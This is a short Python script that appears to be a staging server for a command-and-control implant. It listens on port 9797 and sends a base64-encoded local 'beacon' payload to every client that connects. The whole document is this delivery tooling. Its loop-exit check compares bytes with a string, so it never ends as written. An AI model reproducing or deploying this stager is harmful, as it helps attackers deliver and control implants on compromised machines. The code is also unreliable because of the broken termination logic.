#!/usr/bin/python
import subprocess as sp
from socket import socket
from base64 import b64encode
from socket import(
    AF_INET,
    SOL_SOCKET,
    SOCK_STREAM,
    SO_REUSEADDR
)

sock = socket(AF_INET, SOCK_STREAM)
sock.bind(('0.0.0.0', 9797))
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.listen()

# -- prep beacon script
scriptfile = 'beacon'
with open(scriptfile, 'rb') as sf:
    code = b64encode(sf.read())

# -- serve beacon script
initialized = False

while not initialized:
    conn, addr = sock.accept()
    sent = conn.send(code)
    print('sent code size: {}'.format(sent))
    if conn.recv(1) == '\n':
        initialized = True
    # --
    conn.close()
    if initialized:
        break

print('--end--')


